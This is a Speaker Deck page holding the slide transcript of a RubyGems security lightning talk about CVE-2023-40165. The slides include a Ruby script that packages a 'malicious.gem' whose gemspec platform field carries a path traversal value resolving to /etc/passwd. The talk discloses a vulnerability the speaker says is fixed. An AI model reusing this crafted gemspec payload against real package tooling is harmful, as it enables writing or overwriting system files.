Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Building Broken Gems

Samuel E. Giddins
October 06, 2023
Technology
0
57

Building Broken Gems

Lightning talk given at Rocky Mountain Ruby 2023

Samuel E. Giddins

October 06, 2023
Tweet

More Decks by Samuel E. Giddins

See All by Samuel E. Giddins
The Challenges of Building a Sigstore Client from Scratch
segiddins
0
6
Keeping the Gems Sparkling
segiddins
0
7
A Survey of RubyGems CVEs
segiddins
0
28
Handling 225k requests per second to RubyGems.org
segiddins
0
54
State of the RubyGems 2023
segiddins
0
89
Switching Disciplines as a Tech Lead
segiddins
0
34
Source Code to Executable
segiddins
0
72
Empowering iOS Developers
segiddins
1
67
Empowering iOS Developers
segiddins
0
360

Other Decks in Technology

See All in Technology
AWS Lambda のトラブルシュートをしていて思うこと
kazzpapa3
2
180
アプリエンジニアのためのGraphQL入門.pdf
spycwolf
0
100
これまでの計測・開発・デプロイ方法全部見せます! / Findy ISUCON 2024-11-14
tohutohu
3
370
RubyのWebアプリケーションを50倍速くする方法 / How to Make a Ruby Web Application 50 Times Faster
hogelog
3
950
安心してください、日本語使えますよ―Ubuntu日本語Remix提供休止に寄せて― 2024-11-17
nobutomurata
1
1k
DynamoDB でスロットリングが発生したとき/when_throttling_occurs_in_dynamodb_short
emiki
0
260
OCI Security サービス 概要
oracle4engineer
PRO
0
6.5k
iOS/Androidで同じUI体験をネ イティブで作成する際に気をつ けたい落とし穴
fumiyasac0921
1
110
Storybook との上手な向き合い方を考える
re_taro
1
220
Zennのパフォーマンスモニタリングでやっていること
ryosukeigarashi
0
170
【Pycon mini 東海 2024】Google Colaboratoryで試すVLM
kazuhitotakahashi
2
550
オープンソースAIとは何か? --「オープンソースAIの定義 v1.0」詳細解説
shujisado
10
1.2k

Featured

See All Featured
Thoughts on Productivity
jonyablonski
67
4.3k
The Cult of Friendly URLs
andyhume
78
6k
Building a Scalable Design System with Sketch
lauravandoore
459
33k
Typedesign – Prime Four
hannesfritz
40
2.4k
Making Projects Easy
brettharned
115
5.9k
What's in a price? How to price your products and services
michaelherold
243
12k
Stop Working from a Prison Cell
hatefulcrawdad
267
20k
Art, The Web, and Tiny UX
lynnandtonic
297
20k
Dealing with People You Can't Stand - Big Design 2015
cassininazir
364
24k
Building Better People: How to give real-time feedback that sticks.
wjessup
364
19k
Done Done
chrislema
181
16k
jQuery: Nuts, Bolts and Bling
dougneiner
61
7.5k

Transcript

  1. HOW TO BOIL WATER 1 — segiddins @ Rocky Mountain

    Ruby 2023

  2. BUILDING BROKEN GEMS 2 — segiddins @ Rocky Mountain Ruby

    2023

  3. SAMUEL GIDDINS SECURITY LEAD, RUBYGEMS RUBY CENTRAL 3 — segiddins

    @ Rocky Mountain Ruby 2023

  4. WHAT IS A GEM? $ gem build rails.gemspec Successfully built

    RubyGem Name: rails Version: 7.1.0.beta1 File: rails-7.1.0.beta1.gem 4 — segiddins @ Rocky Mountain Ruby 2023

  5. WHAT IS A GEM? $ file rails-7.1.0.beta1.gem rails-7.1.0.beta1.gem: POSIX tar

    archive 5 — segiddins @ Rocky Mountain Ruby 2023

  6. WHAT IS A GEM? $ tar --list -f rails-7.1.0.beta1.gem metadata.gz

    data.tar.gz checksums.yaml.gz 6 — segiddins @ Rocky Mountain Ruby 2023

  7. WHAT IS A GEM? $ tar --extract \ --file rails-7.1.0.beta1.gem

    \ -O metadata.gz | \ gunzip --- !ruby/object:Gem::Specification name: rails version: !ruby/object:Gem::Version version: 7.1.0.beta1 platform: ruby authors: - David Heinemeier Hansson autorequire: bindir: bin cert_chain: [] date: 2023-10-06 00:00:00.000000000 Z dependencies: [...] description: "..." email: [email protected] executables: [] extensions: [] extra_rdoc_files: [] files: [MIT-LICENSE, README.md] homepage: https://rubyonrails.org licenses: [MIT] metadata: { ... } rdoc_options: [] require_paths: [lib] 7 — segiddins @ Rocky Mountain Ruby 2023

  8. BUT SAMUEL... YOU SAID YOU'RE A SECURITY ENGINEER! 8 —

    segiddins @ Rocky Mountain Ruby 2023

  9. Indeed I am. 9 — segiddins @ Rocky Mountain Ruby

    2023

  10. LET'S PACKAGE OUR OWN GEM #!/usr/bin/env ruby require 'rubygems' require

    'rubygems/package' require 'yaml' file_name = "malicious.gem" package = Gem::Package.new file_name File.open(file_name, "wb") do |file| Gem::Package::TarWriter.new(file) do |gem| gem.add_file "metadata.gz", 0o444 do |io| package.gzip_to(io) do |gz_io| gz_io.write "---!ruby/object:Gem::Specification\n..." end end gem.add_file "data.tar.gz", 0o444 do |io| package.gzip_to io do |gz_io| Gem::Package::TarWriter.new gz_io do |data_tar| # omitted end end end end end 10 — segiddins @ Rocky Mountain Ruby 2023

  11. ... WITH OUT OWN GEMSPEC --- !ruby/hash-with-ivars:Gem::Specification ivars: "@name": book

    "@version": "1" "@new_platform": !ruby/object:Gem::Platform os: "../../../../../../../../etc/passwd" "@original_platform": ruby "@summary": "malicious" "@authors": [[email protected]] 11 — segiddins @ Rocky Mountain Ruby 2023

  12. ... WHICH COULD BE PRETTY BAD TO INSTALL puts YAML.unsafe_load(spec).full_name

    puts File.expand_path( YAML.unsafe_load(spec).full_name, Gem::Specification.gems_dir # /Users/segiddins/.gem/ruby/3.2.2/gems/ ) book-1-../../../../../../../../etc/passwd /etc/passwd 12 — segiddins @ Rocky Mountain Ruby 2023

  13. ... AND PUSH IT TO RUBYGEMS.ORG $ gem push malicious.gem

    Pushing gem to https://rubygems.org... There was a problem saving your gem: Gem platform is invalid, The original platform ruby does not resolve the platform ../../../../../../../../etc/passwd (instead it is ruby) 13 — segiddins @ Rocky Mountain Ruby 2023

  14. ... OH YEAH, I FIXED THIS ONE. 14 — segiddins

    @ Rocky Mountain Ruby 2023

  15. CVE-2023-40165 https://github.com/rubygems/rubygems.org/security/advisories/ GHSA-rxcq-2m4f-94wm 15 — segiddins @ Rocky Mountain Ruby

    2023

  16. 16 — segiddins @ Rocky Mountain Ruby 2023

  17. WASN'T THAT FUN? 17 — segiddins @ Rocky Mountain Ruby

    2023

  18. @SEGIDDINS SUPPORT RUBY CENTRAL TO ALLOW ME TO KEEP FINDING

    & FIXING THESE VULNERABILITIES! 18 — segiddins @ Rocky Mountain Ruby 2023